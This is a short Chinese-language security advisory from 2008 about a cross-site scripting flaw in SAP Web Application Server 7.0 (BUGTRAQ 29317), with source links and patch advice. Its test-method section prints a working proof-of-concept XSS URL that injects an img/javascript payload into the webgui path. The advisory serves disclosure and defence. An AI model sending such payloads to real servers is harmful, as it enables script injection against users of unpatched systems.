发布日期：2008-05-21
更新日期：2008-05-22

受影响系统：

SAP Web Application Server 7.0

描述：

---

BUGTRAQ  ID: 29317

SAP Web应用服务器可给企业用户带来更高的互操作性和灵活性，为产品增加额外的Web服务。

SAP Web应用服务实现上存在输入验证漏洞，如果远程攻击者向SAP Web应用服务器提交了恶意的/sap/bc/gui/sap/its/webgui/ URL请求的话，就可以执行跨站脚本攻击。

<*来源：DSecRG （http://www.dsec.ru）
  
  链接：http://marc.info/?l=bugtraq&m=121138353510516&w=2
        http://secunia.com/advisories/30334/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://[server]:8000/sap/bc/gui/sap/its/webgui/aaaaaaa"><img/src=javascript:alert('DSECRG_XSS')>

建议：

---

厂商补丁：

SAP
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.sap.com/

浏览次数：2350
严重程度：0（网友投票）